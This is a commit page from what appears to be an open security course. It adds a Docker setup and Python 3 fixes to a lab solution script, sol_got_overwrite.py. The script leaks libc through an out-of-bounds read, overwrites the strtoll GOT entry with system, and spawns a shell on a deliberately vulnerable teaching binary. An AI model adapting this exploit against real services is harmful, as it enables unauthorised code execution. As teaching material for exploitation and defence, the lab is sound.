Add files for the Dockerfile and few modifications to the sol_got_ove…

…rwrite.py for 02-rwslotmachine2 Signed-off-by: Bianca Ioana <[email protected]>
open-education-hub · Dec 11, 2024 · 3ac960b · 3ac960b
1 parent 2d21544
commit 3ac960b
Show file tree

Hide file tree

Showing 4 changed files with 74 additions and 13 deletions.
diff --git a/.dockerignore b/.dockerignore
diff --git a/...s-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile b/...s-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile
@@ -0,0 +1,33 @@
+# Build Stage
+FROM gcc:latest AS build
+
+# Set working directory
+WORKDIR /app
+
+# Copy the source code into the container
+COPY rwslotmachine2.c .
+
+# Compile the source code into an executable
+RUN gcc rwslotmachine2.c -o rwslotmachine2 -Wall -Wextra
+
+# Runtime Stage
+# FROM debian:bullseye-slim
+FROM ubuntu:latest
+
+# Install necessary runtime libraries
+RUN apt-get update && apt-get install -y \
+    libc6 \
+    && rm -rf /var/lib/apt/lists/*
+
+# Set working directory
+WORKDIR /app
+
+# Copy the compiled executable from the builder stage
+# COPY --from=build /app/rwslotmachine2 .
+COPY --from=build /app/rwslotmachine2 /app/rwslotmachine2
+
+# Expose the port where the program will operate
+EXPOSE 31345
+
+# Run the program
+CMD ["./rwslotmachine2"]
diff --git a/...ensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md b/...ensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md
@@ -0,0 +1,17 @@
+## Building and Running
+
+1. Build the Docker image:
+   ```bash
+   docker build -t rwslotmachine2 .
+   ```
+
+
+2. Run the Docker image:
+   ```bash
+   docker run -p 31345:31345 rwslotmachine2
+   ```
+
+3. Test with the Python exploit:
+   ```bash
+   python3 sol_got_overwrite.py
+   ```
diff --git a/...nsive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py b/...nsive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py
@@ -13,21 +13,21 @@
 
 
 def do_read(idx):
-    p.recvuntil(">")
-    p.sendline("1")
-    p.recvuntil("index:")
-    p.sendline(str(idx))
-    p.recvuntil("]: ")
-    return int(p.recvuntil("\n")[:-1], 16)
+    p.recvuntil(b">")
+    p.sendline(b"1")
+    p.recvuntil(b"index:")
+    p.sendline(str(idx).encode())
+    p.recvuntil(b"]: ")
+    return int(p.recvuntil(b"\n")[:-1], 16)
 
 
 def do_write(idx, value):
-    p.recvuntil(">")
-    p.sendline("2")
-    p.recvuntil("index:")
-    p.sendline(str(idx))
-    p.recvuntil("value:")
-    p.sendline(hex(value))
+    p.recvuntil(b">")
+    p.sendline(b"2")
+    p.recvuntil(b"index:")
+    p.sendline(str(idx).encode())
+    p.recvuntil(b"value:")
+    p.sendline(hex(value).encode())
 
 
 slots_offset = binary.symbols["slots"]
@@ -38,11 +38,22 @@ def do_write(idx, value):
 index_to_strtoll = (strtoll_got_offset - slots_offset) / 4
 
 libc_leak = do_read(index_to_puts)
+print(f"Libc leak: {hex(libc_leak)}")
+
 libc_base = libc_leak - libc.symbols["puts"]
+print(f"Libc base: {hex(libc_base)}")
+
 system = libc_base + libc.symbols["system"]
+print(f"System address: {hex(system)}")
+
+# Debugging the overwrite
+print(f"Overwriting GOT entry for strtoll with address: {hex(system)}")
 
 do_write(index_to_strtoll, system)
+# Debugging shell spawn
+print("Exploitation completed, sending /bin/sh...")
+
 
-p.sendline("/bin/sh")
+p.sendline(b"/bin/sh")
 
 p.interactive()